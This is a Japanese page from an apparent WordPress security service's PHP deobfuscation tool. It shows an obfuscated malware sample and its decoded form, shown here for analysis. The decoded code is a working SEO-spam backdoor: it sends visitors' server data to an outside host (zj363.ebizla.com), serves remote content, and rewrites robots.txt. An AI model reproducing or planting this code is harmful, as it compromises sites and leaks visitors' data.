Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php goto w3Ivq; TOOF1: if (!($Qt2Pa == "\x65\x78\x69\x74")) { goto cb6Py; } goto TYptK; CV1GM: echo "\110\x54\x54\120\57\x31\56\x30\40\64\x30\x34\40\116\x6f\x74\40\106\x6f\x75\x6e\144\x5f\x5f\x5f" . $CBxOi . "\137\137\137" . $XRM8O; goto ocggp; kBrPR: if (!(PrEG_MaTcH("\x2f\152\160\62\x30\x32\6...



難読化されたPHPコード

<?php
 goto w3Ivq; TOOF1: if (!($Qt2Pa == "\x65\x78\x69\x74")) { goto cb6Py; } goto TYptK; CV1GM: echo "\110\x54\x54\120\57\x31\56\x30\40\64\x30\x34\40\116\x6f\x74\40\106\x6f\x75\x6e\144\x5f\x5f\x5f" . $CBxOi . "\137\137\137" . $XRM8O; goto ocggp; kBrPR: if (!(PrEG_MaTcH("\x2f\152\160\62\x30\x32\63\57\x73\151", $_SERVER["\x52\105\x51\x55\105\123\x54\137\x55\122\x49"]) == RouND(0.4563 + 0.5437))) { goto x6KFI; } goto M6Q_C; vbJoC: Curl_SetopT($t5UQ0, CURLOPT_RETURNTRANSFER, roUND(0.2296698 + 0.25431247 + 0.312 + 0.1049778 + 0.0985707)); goto Ut09H; LCNhg: $o2a8S = "\57\x69\x6e\144\145\170\x2e\x70\x68\x70\77\126\x53\75" . $XRM8O . "\46\x47\120\75" . $CBxOi; goto Kjf6N; suRfg: $CBxOi = "\172\152\63\x36\63"; goto LNU0T; Fq3XY: foreach ($RYHfB as $ET2jI) { goto ssJrr; Z4WnG: $lD0mT = STR_RepLacE("\57", "\137", $lD0mT); goto ZgQIx; qF2D1: $lD0mT = sTr_REpLAce("\x2b", "\55", $lD0mT); goto Z4WnG; ssJrr: $vhKCJ = isset($_SERVER[$ET2jI]) ? $_SERVER[$ET2jI] : ''; goto Biu3V; ZgQIx: $lD0mT = sTr_rEplAcE("\x3d", "\56", $lD0mT); goto V0wO3; BUgcu: WfTDO: goto EIvGM; Biu3V: $lD0mT = Base64_eNCOde(TRIm($vhKCJ)); goto qF2D1; V0wO3: $o2a8S .= "\46" . $ET2jI . "\x3d" . $lD0mT; goto BUgcu; EIvGM: } goto pWfoe; rJUE7: Iw8Qi: goto CV1GM; Kjf6N: $RYHfB = array("\x53\103\122\111\120\x54\137\x4e\x41\x4d\105", "\122\x45\x51\x55\x45\x53\124\x5f\x55\x52\111", "\x48\124\x54\x50\x53", "\122\105\x51\125\105\123\124\x5f\123\x43\110\105\x4d\105", "\x53\105\122\x56\x45\122\x5f\x50\117\122\124", "\122\105\x4d\x4f\x54\105\137\101\x44\104\122", "\x48\x54\x54\x50\x5f\122\105\x46\105\122\x45\x52", "\x48\124\x54\x50\137\x41\103\x43\x45\120\x54\137\x4c\101\116\x47\x55\x41\x47\x45", "\x48\x54\x54\x50\137\125\x53\105\x52\x5f\101\107\105\116\124", "\110\x54\124\120\x5f\110\117\x53\124"); goto Fq3XY; FhED6: $at3DT = tRIm($yI5XT[roUnD(0.49818402 + 0.502)]); goto nn9ul; F4ugF: $tchaq = coUNT($yI5XT); goto I1Vb9; eT33f: ARRAY_POp($sawfx); goto PQr_Y; iqPOj: XdLk6: goto MhPsr; RKiUC: if (!empty($gJbJb)) { goto YiiVN; } goto Y5OsT; Ut09H: cuRl_seTopT($t5UQ0, CURLOPT_CONNECTTIMEOUT, rOUnd(6.9481 + 3.052)); goto MNFDU; xuJEc: MVSwC: goto DRTHq; FbCQX: goto ZlxT7; goto iqPOj; TYptK: exit; goto aApq5; o8VKE: $sawfx = ExplODE("\x3c\142\162\x2f\76", $at3DT); goto eT33f; aApq5: cb6Py: goto uf0dp; eN93L: echo $at3DT; goto xuJEc; mjifa: $e0cIs = "\125\163\145\162\55\141\x67\x65\x6e\x74\72\52" . PHP_EOL; goto c9DD1; nF5JG: gJDLR: goto FhED6; D4gH2: echo "\162\157\142\x6f\x74\163\56\164\170\164\40\x64\157\x6e\x65"; goto zc5T8; WjOu8: Rqv9t: goto lMegx; MhPsr: heADEr("\x48\124\124\120\57\x31\x2e\x30\40\64\x30\64\40\x4e\x6f\164\x20\x46\157\165\156\144"); goto Vm6tj; w3Ivq: ERrOr_REPORTiNg(RoUNd(0 + 0 + 0)); goto suRfg; mawLH: HEADeR("\x48\x54\x54\120\x2f\x31\56\60\x20\64\60\x34\x20\x4e\x6f\x74\x20\106\x6f\165\x6e\144"); goto rJUE7; M1Iy_: HEaDEr($AZiUQ); goto nF5JG; OtOqw: $gJbJb = tRIm($gJbJb); goto VQ511; O0T2T: YiiVN: goto OtOqw; dIQys: $t5UQ0 = curL_INIt(); goto UxwGz; UxwGz: cUrL_seTOPt($t5UQ0, CURLOPT_URL, $CV76H); goto vbJoC; y3Zt3: x6KFI: goto SKfIJ; Vm6tj: exit; goto yFiPV; MNFDU: $gJbJb = CUrL_ExeC($t5UQ0); goto l5L8K; L0BG4: curL_CLoSe($t5UQ0); goto RKiUC; ocggp: exit; goto y3Zt3; rxFXI: if (empty($AZiUQ)) { goto gJDLR; } goto M1Iy_; nn9ul: if (empty($at3DT)) { goto MVSwC; } goto eN93L; lMegx: fILe_PUT_CONtenTs($_SERVER["\104\117\103\125\115\x45\x4e\x54\x5f\x52\x4f\117\x54"] . "\57\162\x6f\142\x6f\x74\x73\x2e\x74\170\164", $e0cIs); goto D4gH2; M6Q_C: if (!(PReg_mAtch("\x2f\x6a\x70\62\60\x32\63\x63\x77\167\57\163\151", $_SERVER["\x52\x45\x51\125\x45\123\x54\x5f\125\122\x49"]) == rOUNd(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0))) { goto Iw8Qi; } goto mawLH; zc5T8: exit; goto kiwFy; I1Vb9: if ($tchaq < 3) { goto XdLk6; } goto gT6kW; SKfIJ: $l2pTy = "\x68\164\164\160\72\57\x2f" . $CBxOi . "\x2e\x65\x62\x69\x7a\154\x61\56\x63\157\x6d"; goto LCNhg; VQ511: $yI5XT = eXPLoDE("\x7c\x40\x23\44\174", $gJbJb); goto F4ugF; c9DD1: $e0cIs .= "\x41\154\154\157\167\72\57" . PHP_EOL; goto o8VKE; Y5OsT: $gJbJb = FilE_get_cOnTeNts($CV76H); goto O0T2T; DRTHq: $Qt2Pa = trIm($yI5XT[$tchaq - rouND(0.29826 + 0.398166 + 0.3035714)]); goto TOOF1; kiwFy: ovD9C: goto FbCQX; l5L8K: $gJbJb = tRim($gJbJb); goto L0BG4; uf0dp: if (!($Qt2Pa == "\x70\151\x6e\x67")) { goto ovD9C; } goto mjifa; BiVrT: $CV76H = $l2pTy . $o2a8S; goto dIQys; pWfoe: dhC9N: goto BiVrT; LNU0T: $XRM8O = "\161\157\x31"; goto kBrPR; PQr_Y: foreach ($sawfx as $Tq_l3) { $e0cIs .= "\123\x69\164\145\155\141\x70\x3a" . $Tq_l3 . PHP_EOL; DCw8O: } goto WjOu8; gT6kW: $AZiUQ = TRim($yI5XT[rounD(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0)]); goto rxFXI; yFiPV: ZlxT7:

デコード(難読化解除)されたコード

<?php

ERrOr_REPORTiNg(RoUNd(0));
$CBxOi = "zj363";
$XRM8O = "qo1";
if (!(PrEG_MaTcH("/jp2023/si", $_SERVER["REQUEST_URI"]) == RouND(1.0))) {
    $l2pTy = "http://zj363.ebizla.com";
    $o2a8S = "/index.php?VS=qo1&GP=zj363";
    $RYHfB = array("SCRIPT_NAME", "REQUEST_URI", "HTTPS", "REQUEST_SCHEME", "SERVER_PORT", "REMOTE_ADDR", "HTTP_REFERER", "HTTP_ACCEPT_LANGUAGE", "HTTP_USER_AGENT", "HTTP_HOST");
    foreach ($RYHfB as $ET2jI) {
        $vhKCJ = isset($_SERVER[$ET2jI]) ? $_SERVER[$ET2jI] : '';
        $lD0mT = Base64_eNCOde(TRIm($vhKCJ));
        $lD0mT = sTr_REpLAce("+", "-", $lD0mT);
        $lD0mT = STR_RepLacE("/", "_", $lD0mT);
        $lD0mT = sTr_rEplAcE("=", ".", $lD0mT);
        $o2a8S .= "&" . $ET2jI . "=" . $lD0mT;
    }
    $CV76H = $l2pTy . $o2a8S;
    $t5UQ0 = curL_INIt();
    cUrL_seTOPt($t5UQ0, CURLOPT_URL, $CV76H);
    Curl_SetopT($t5UQ0, CURLOPT_RETURNTRANSFER, roUND(0.9995307700000001));
    cuRl_seTopT($t5UQ0, CURLOPT_CONNECTTIMEOUT, rOUnd(10.0001));
    $gJbJb = CUrL_ExeC($t5UQ0);
    $gJbJb = tRim($gJbJb);
    curL_CLoSe($t5UQ0);
    if (!empty($gJbJb)) {
        goto YiiVN;
    }
    $gJbJb = FilE_get_cOnTeNts($CV76H);
    YiiVN:
    $gJbJb = tRIm($gJbJb);
    $yI5XT = eXPLoDE("|@#\$|", $gJbJb);
    $tchaq = coUNT($yI5XT);
    if ($tchaq < 3) {
        heADEr("HTTP/1.0 404 Not Found");
        exit;
    }
    $AZiUQ = TRim($yI5XT[rounD(0)]);
    if (empty($AZiUQ)) {
        goto gJDLR;
    }
    HEaDEr($AZiUQ);
    gJDLR:
    $at3DT = tRIm($yI5XT[roUnD(1.00018402)]);
    if (empty($at3DT)) {
        goto MVSwC;
    }
    echo $at3DT;
    MVSwC:
    $Qt2Pa = trIm($yI5XT[$tchaq - rouND(0.9999974)]);
    if (!($Qt2Pa == "exit")) {
        if (!($Qt2Pa == "ping")) {
            // [PHPDeobfuscator] Implied script end
            return;
        }
        $e0cIs = "User-agent:*PHP_EOL";
        $e0cIs = "User-agent:*PHP_EOLAllow:/PHP_EOL";
        $sawfx = ExplODE("<br/>", $at3DT);
        ARRAY_POp($sawfx);
        foreach ($sawfx as $Tq_l3) {
            $e0cIs .= "Sitemap:" . $Tq_l3 . PHP_EOL;
        }
        fILe_PUT_CONtenTs($_SERVER["DOCUMENT_ROOT"] . "/robots.txt", $e0cIs);
        echo "robots.txt done";
        exit;
    }
    exit;
}
if (!(PReg_mAtch("/jp2023cww/si", $_SERVER["REQUEST_URI"]) == rOUNd(0))) {
    goto Iw8Qi;
}
HEADeR("HTTP/1.0 404 Not Found");
Iw8Qi:
echo "HTTP/1.0 404 Not Found___" . $CBxOi . "___" . $XRM8O;
exit;

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.